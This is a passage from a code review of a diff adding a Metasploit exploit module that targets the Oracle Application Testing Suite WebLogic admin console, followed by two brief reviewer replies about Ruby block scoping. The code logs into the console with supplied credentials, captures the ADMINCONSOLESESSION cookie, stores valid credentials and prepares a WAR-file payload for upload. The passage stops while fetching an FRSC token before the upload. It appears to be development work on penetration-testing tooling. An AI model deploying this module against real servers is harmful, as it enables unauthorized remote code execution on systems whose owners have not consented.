modules/exploits/windows/http/oats_weblogic_console.rb

```diff
@@ -0,0 +1,388 @@
+        OptString.new('HttpPassword', [true, 'The password for the admin console'])
+      ])
+
+    register_advanced_options(
+      [
+        OptString.new('DEFAULTOATSPATH', [false, 'The default path for OracleATS'])
+      ])
+  end
+
+  class LoginSpec
+    attr_accessor :admin_console_session
+  end
+
+  def login_spec
+    @login_spec ||= LoginSpec.new
+  end
+
+  class OatsWarPayload < MetasploitModule
+    attr_reader :name
+    attr_reader :war
+
+    def initialize(payload)
+      @name = Rex::Text.rand_name
+      @war = payload.encoded_war(app_name: name).to_s
+    end
+  end
+
+  def default_oats_path
+    @default_oats_path ||= lambda { datastore['DEFAULTOATSPATH'] || 'C:\\OracleATS' }.call
+  end
+
+  def war_payload
+    @war_payload ||= OatsWarPayload.new(payload)
+  end
+
+  def set_frsc
+    value = get_deploy_frsc
+    @frsc = value
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
+    })
+
+    if res && res.body.include?('Oracle WebLogic Server Administration Console')
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def set_admin_console_session(res)
+    cookie = res.get_cookies
+    admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
+    vprint_status("Token for console session is: #{admin_console_session}")
+    login_spec.admin_console_session = admin_console_session
+  end
+
+  def is_logged_in?(res)
+    html = res.get_html_document
+    a_element = html.at('a')
+    link = a_element.attributes['href'].value
+    URI(link).request_uri == '/console'
+  end
+
+  def do_login
+    uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    fail_with(Failure::Unknown, 'No response from server') unless res
+    set_admin_console_session(res)
+
+    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_post' =>
+        {
+          'j_username'           => datastore['HttpUsername'],
+          'j_password'           => datastore['HttpPassword'],
+          'j_character_encoding' => 'UTF-8'
+        }
+    })
+
+    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
+    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
+    store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
+    set_admin_console_session(res)
+  end
+
+  def get_deploy_frsc
+    # First we are just going through the pages in a specific order to get the FRSC value
+    # we need to prepare uploading the WAR file.
+    res = nil
```

Comment:
```suggestion
```

Reply:
I actually need that because `res` is in the `each` block.

Reply:
Damn block scoping. :)